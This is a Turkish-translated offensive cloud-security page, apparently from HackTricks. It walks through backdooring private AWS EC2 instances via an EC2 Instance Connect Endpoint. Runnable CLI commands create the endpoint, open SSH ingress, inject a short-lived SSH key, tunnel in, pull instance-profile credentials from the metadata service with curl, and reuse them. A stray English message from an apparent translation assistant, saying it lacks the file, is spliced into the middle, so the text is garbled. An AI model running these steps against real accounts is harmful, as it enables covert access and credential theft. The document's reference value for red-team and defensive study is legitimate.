AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.

EIC Endpoint’i kötüye kullanarak public IP/bastion olmayan private EC2 instance’lara inbound SSH erişimi elde edin:

• Hedef subnet içinde bir EIC Endpoint oluşturmak
• EIC Endpoint SG’den hedef SG’ye inbound SSH izni vermek
• Kısa ömürlü bir SSH public key (yaklaşık 60 saniye geçerli) ec2-instance-connect:SendSSHPublicKey ile enjekte etmek
• EIC tüneli açıp instance’a pivot yaparak IMDS’den instance profile kimlik bilgilerini çalmak

Impact: bastions ve public IP kısıtlamalarını atlayan, private EC2 instance’lara gizli bir uzaktan erişim yolu. Saldırgan instance profile’ı üstlenebilir ve hesap içinde işlem yapabilir.

Gereksinimler

• İzinler:
• ec2:CreateInstanceConnectEndpoint, ec2:Describe*, ec2:AuthorizeSecurityGroupIngress
• ec2-instance-connect:SendSSHPublicKey, ec2-instance-connect:OpenTunnel
• Hedef Linux instance; SSH server yüklü ve EC2 Instance Connect etkin (Amazon Linux 2 veya Ubuntu 20.04+). Varsayılan kullanıcılar: ec2-user (AL2) veya ubuntu (Ubuntu).

Değişkenler

export REGION=us-east-1
export INSTANCE_ID=<i-xxxxxxxxxxxx>
export SUBNET_ID=<subnet-xxxxxxxx>
export VPC_ID=<vpc-xxxxxxxx>
export TARGET_SG_ID=<sg-of-target-instance>
export ENDPOINT_SG_ID=<sg-for-eic-endpoint>
# OS user for SSH (ec2-user for AL2, ubuntu for Ubuntu)
export OS_USER=ec2-user

EIC Uç Noktası Oluşturma

aws ec2 create-instance-connect-endpoint \
--subnet-id "$SUBNET_ID" \
--security-group-ids "$ENDPOINT_SG_ID" \
--tag-specifications 'ResourceType=instance-connect-endpoint,Tags=[{Key=Name,Value=Backdoor-EIC}]' \
--region "$REGION" \
--query 'InstanceConnectEndpoint.InstanceConnectEndpointId' --output text | tee EIC_ID

# Wait until ready
while true; do
aws ec2 describe-instance-connect-endpoints \
--instance-connect-endpoint-ids "$(cat EIC_ID)" --region "$REGION" \
--query 'InstanceConnectEndpoints[0].State' --output text | tee EIC_STATE
grep -q 'create-complete' EIC_STATE && break
sleep 5
done

EIC Endpoint’ten hedef instance’a trafik izni verin

aws ec2 authorize-security-group-ingress \
--group-id "$TARGET_SG_ID" --protocol tcp --port 22 \
--source-group "$ENDPOINT_SG_ID" --region "$REGION" || true

Geçici SSH anahtarını enjekte et ve tünel aç

# Generate throwaway key
ssh-keygen -t ed25519 -f /tmp/eic -N ''

# Send short-lived SSH pubkey (valid ~60s)
aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "$OS_USER" \
--ssh-public-key file:///tmp/eic.pub \
--region "$REGION"

# Open a local tunnel to instance:22 via the EIC Endpoint
aws ec2-instance-connect open-tunnel \
--instance-id "$INSTANCE_ID" \
--instance-connect-endpoint-id "$(cat EIC_ID)" \
--local-port 2222 --remote-port 22 --region "$REGION" &
TUN_PID=$!; sleep 2

# SSH via the tunnel (within the 60s window)
ssh -i /tmp/eic -p 2222 "$OS_USER"@127.0.0.1 -o StrictHostKeyChecking=no

Post-exploitation kanıtı (steal instance profile credentials)

# From the shell inside the instance
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ | tee ROLE
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$(cat ROLE)

I don’t have the file content. Please paste the markdown content of src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md here (or the specific sections you want translated).

Reminder of translation rules I’ll follow:

• Translate relevant English text to Turkish.
• Do NOT translate code, hacking technique names, common hacking/cloud words (Workspace, aws, gcp, pentesting, leak, etc.), links, paths, refs, tags, or markdown/html syntax.
• Preserve tags/paths exactly (e.g. {#tabs}, {#ref}…{#endref}, filenames, links).

Paste the content and I’ll return the translated markdown.

{
"Code": "Success",
"AccessKeyId": "ASIA...",
"SecretAccessKey": "w0G...",
"Token": "IQoJ...",
"Expiration": "2025-10-08T04:09:52Z"
}

Kimliği doğrulamak için çalınmış creds’i yerel olarak kullanın:

export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
aws sts get-caller-identity --region "$REGION"
# => arn:aws:sts::<ACCOUNT_ID>:assumed-role/<InstanceRoleName>/<InstanceId>

Temizleme

# Revoke SG ingress on the target
aws ec2 revoke-security-group-ingress \
--group-id "$TARGET_SG_ID" --protocol tcp --port 22 \
--source-group "$ENDPOINT_SG_ID" --region "$REGION" || true

# Delete EIC Endpoint
aws ec2 delete-instance-connect-endpoint \
--instance-connect-endpoint-id "$(cat EIC_ID)" --region "$REGION"

Notlar

• Enjekte edilen SSH anahtarı yalnızca ~60 saniye geçerlidir; anahtarı tunnel/SSH açmadan hemen önce gönderin.
• OS_USER, AMI ile eşleşmelidir (ör. ubuntu için Ubuntu, ec2-user için Amazon Linux 2). [!TIP] AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
  GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
  Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• Abonelik planlarını kontrol edin!
• Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
• PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.